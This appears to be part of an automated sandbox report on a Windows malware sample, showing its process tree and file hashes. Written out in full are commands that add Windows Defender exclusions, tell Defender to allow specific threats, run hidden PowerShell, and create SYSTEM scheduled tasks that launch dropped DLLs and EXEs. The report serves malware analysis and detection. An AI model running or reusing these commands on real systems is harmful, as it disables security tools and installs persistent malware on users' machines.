                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ" /t REG_DWORD /d 0 /reg:32
                                                                                                                  4⤵
                                                                                                                  • Windows security bypass
                                                                                                                  PID:1628
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ" /t REG_DWORD /d 0 /reg:64
                                                                                                                  4⤵
                                                                                                                  • Windows security bypass
                                                                                                                  PID:1316
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:32
                                                                                                                  4⤵
                                                                                                                  • Windows security bypass
                                                                                                                  PID:1156
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:64
                                                                                                                  4⤵
                                                                                                                  • Windows security bypass
                                                                                                                  PID:2804
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR" /t REG_DWORD /d 0 /reg:32
                                                                                                                  4⤵
                                                                                                                    PID:1364
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR" /t REG_DWORD /d 0 /reg:64
                                                                                                                    4⤵
                                                                                                                      PID:1056
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGSqLNfOU" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                        PID:1196
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGSqLNfOU" /t REG_DWORD /d 0 /reg:64
                                                                                                                        4⤵
                                                                                                                          PID:2736
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jbywMxbyABuU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                          4⤵
                                                                                                                            PID:2876
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jbywMxbyABuU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                            4⤵
                                                                                                                              PID:2956
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jgefCrdckMUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                              4⤵
                                                                                                                                PID:2776
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jgefCrdckMUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                4⤵
                                                                                                                                  PID:2508
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vZXYUjRGERiGC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                  4⤵
                                                                                                                                    PID:1860
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vZXYUjRGERiGC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                    4⤵
                                                                                                                                      PID:2192
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tvOexZGeSXRtrQVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                      4⤵
                                                                                                                                        PID:1208
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tvOexZGeSXRtrQVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        4⤵
                                                                                                                                          PID:2780
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                          4⤵
                                                                                                                                            PID:948
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            4⤵
                                                                                                                                              PID:1356
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ" /t REG_DWORD /d 0 /reg:32
                                                                                                                                              4⤵
                                                                                                                                                PID:896
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                4⤵
                                                                                                                                                  PID:1668
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                    PID:1912
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                      PID:1408
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /CREATE /TN "LyeaCXeAXIXykqmfO" /SC once /ST 11:49:24 /RU "SYSTEM" /TR "\"C:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\UrKxsyL.exe\" lW /KXJydidNO 385135 /S" /V1 /F
                                                                                                                                                    3⤵
                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                    PID:2380
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /run /I /tn "LyeaCXeAXIXykqmfO"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:2340
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 456
                                                                                                                                                      3⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:2912
                                                                                                                                                  • C:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\UrKxsyL.exe
                                                                                                                                                    C:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\UrKxsyL.exe lW /KXJydidNO 385135 /S
                                                                                                                                                    2⤵
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Drops Chrome extension
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    PID:2148
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2596
                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:2652
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                              5⤵
                                                                                                                                                                PID:1156
                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:2624
                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:2400
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:2804
                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:2788
                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:2404
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:2468
                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:1328
                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:2196
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:1056
                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:1864
                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:1684
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:1812
                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                          PID:2996
                                                                                                                                                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                            7⤵
                                                                                                                                                                                              PID:1488
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /DELETE /F /TN "bKPbLIPtdWjYWtgKbM"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:2292
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:1440
                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:928
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:1284
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:1208
                                                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      PID:932
                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:1728
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:1600
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                        PID:3004
                                                                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                            PID:2796
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TGSqLNfOU\QRZrZs.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rkutRMUCKyfxaPV" /V1 /F
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                    PID:1000
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /CREATE /TN "rkutRMUCKyfxaPV2" /F /xml "C:\Program Files (x86)\TGSqLNfOU\EtNNIjR.xml" /RU "SYSTEM"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                    PID:1920
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /END /TN "rkutRMUCKyfxaPV"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:1428
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /DELETE /F /TN "rkutRMUCKyfxaPV"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:656
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TN "ymGpHCUadFDCAu" /F /xml "C:\Program Files (x86)\jbywMxbyABuU2\zaBoYmY.xml" /RU "SYSTEM"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:612
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TN "KIJZzoLWERVEa2" /F /xml "C:\ProgramData\tvOexZGeSXRtrQVB\oDdyLFf.xml" /RU "SYSTEM"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:1384
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TN "cKCvNSfFKKPlDebmW2" /F /xml "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR\JZwqBNK.xml" /RU "SYSTEM"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:932
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TN "kIVMXXvuSFGZiLTKXPV2" /F /xml "C:\Program Files (x86)\vZXYUjRGERiGC\laurhaI.xml" /RU "SYSTEM"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:3004
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /CREATE /TN "WEqRGXvoovdTvsnPk" /SC once /ST 10:56:39 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\jLjeNaiUMFXhhNbk\FARZDoKf\WOrJXlG.dll\",#1 /cdidJjWi 385135" /V1 /F
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                        PID:1616
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /run /I /tn "WEqRGXvoovdTvsnPk"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:1940
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /DELETE /F /TN "LyeaCXeAXIXykqmfO"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:2944
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 1560
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                            PID:1372
                                                                                                                                                                                                        • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jLjeNaiUMFXhhNbk\FARZDoKf\WOrJXlG.dll",#1 /cdidJjWi 385135
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:1428
                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jLjeNaiUMFXhhNbk\FARZDoKf\WOrJXlG.dll",#1 /cdidJjWi 385135
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                              PID:2752
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /DELETE /F /TN "WEqRGXvoovdTvsnPk"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:588
                                                                                                                                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                            taskeng.exe {477ACFFA-0528-4DF2-8A40-1ED812C15838} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:2580
                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                PID:816
                                                                                                                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:1924
                                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "-61946819-1232110082-961599025634482856155207549-2113628140-16350094641341492039"
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:2356
                                                                                                                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:2632
                                                                                                                                                                                                                  • C:\Program Files (x86)\AVG\Browser\Application\109.0.24111.121\elevation_service.exe
                                                                                                                                                                                                                    "C:\Program Files (x86)\AVG\Browser\Application\109.0.24111.121\elevation_service.exe"
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:2796
                                                                                                                                                                                                                  • C:\Program Files (x86)\AVG\Browser\Application\109.0.24111.121\elevation_service.exe
                                                                                                                                                                                                                    "C:\Program Files (x86)\AVG\Browser\Application\109.0.24111.121\elevation_service.exe"
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:2372
                                                                                                                                                                                                                  • C:\Program Files (x86)\AVG\Browser\Application\109.0.24111.121\elevation_service.exe
                                                                                                                                                                                                                    "C:\Program Files (x86)\AVG\Browser\Application\109.0.24111.121\elevation_service.exe"
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:1020
                                                                                                                                                                                                                  • C:\Program Files (x86)\AVG\Browser\Application\109.0.24111.121\elevation_service.exe
                                                                                                                                                                                                                    "C:\Program Files (x86)\AVG\Browser\Application\109.0.24111.121\elevation_service.exe"
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:916

                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                  • C:\Program Files (x86)\AVG\Browser\Application\109.0.24111.121\Installer\setup.exe

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.6MB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    3154bd011dbecd86e6de6db6393b1f72

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    914b3a63458f2dd05432bb5e4d8fc53966ce2ed7

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    f5d036674fbeb5ae3b6d6208054151a1f280994cbf8ef80416d54cde1864d119

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    a92a5246ccdcaabe370c0eb60f4fb1d7dac672db1ee70acb06f6cfe227d343551cd6f45919906717ec29dc213c56436ff4801bc08586e6a679fb1d42b85b2987

                                                                                                                                                                                                                  • C:\Program Files (x86)\AVG\Browser\Application\Dictionaries\en-US-10-1.bdic

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    441KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    4604e676a0a7d18770853919e24ec465

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    415ef3b2ca0851e00ebaf0d6c9f6213c561ac98f

                                                                                                                                                                                                                    SHA256

